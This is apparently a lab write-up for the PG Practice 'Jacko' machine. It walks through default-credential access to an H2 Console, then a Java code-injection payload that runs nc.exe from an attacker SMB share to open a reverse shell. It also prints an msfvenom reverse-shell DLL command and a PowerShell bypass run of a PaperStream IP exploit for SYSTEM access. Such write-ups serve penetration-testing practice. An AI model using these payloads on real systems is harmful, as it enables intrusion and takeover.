Jacko
PG Practice Jacko writeup
Nmap
On port 8082 we have a login page for H2 Console. Connecting with the default inputted values allows login to the console.
Once logged in we can see that we are running on H2 Console version 1.4.199. A search on exploit-db shows that version 1.4.199 is vulnerable to code injection using Java.
The following snippet is the vulnerable code we need to run on the H2 Console:
The section of the code that executed commands on the target machine has been shown below. To achieve code execution I set up a SMB Server on my attacking machine with Impacket's SMBserver.py script and ensured nc.exe
was in the specified SMB share.
-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');
First set up a SMB server:
Then paste the code from exploit-db into the SQL statement section of the website and ensure the --evaluate script section has the command for calling nc.exe
on the attacking machines SMB server.
When ready run the SQL statement and we should see authentication on smbserver.py
And then shortly after catch a reverse shell on our netcat
listener.
First we need to fix PATH on the target machine as shown below:
Looking through Program files (x86) we can see a directory called PAPERSTREAM IP. Looking for exploits on exploit-db takes us to the following:
The description for this exploit is shown below:
We need to change the DLL name generated by msfvenom
and the payload location. When I attempted to download exploit to c:\windows\temp my file was deleted instantly. Possibly by AV?
First I generated a msfvenom
shell to the name of the DLL required which is UninOldIS.dll. msfvenom -p windows/shell_reverse_tcp -f dll -o UninOldIS.dll LHOST=192.168.49.67 LPORT=8082
Then changed the payload file variable to the users Desktop.
At this point move into the users Desktop then use certutil
to download the files as when copying by SMB I could get the payload to trigger without issues.
Start a netcat
listener on the attacking machine to listen in on port 8082. Then execute the Powershell exploit.ps1 on the target machine.
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\Desktop\exploit.ps1
A short while later we should receive a shell as SYSTEM.
Last updated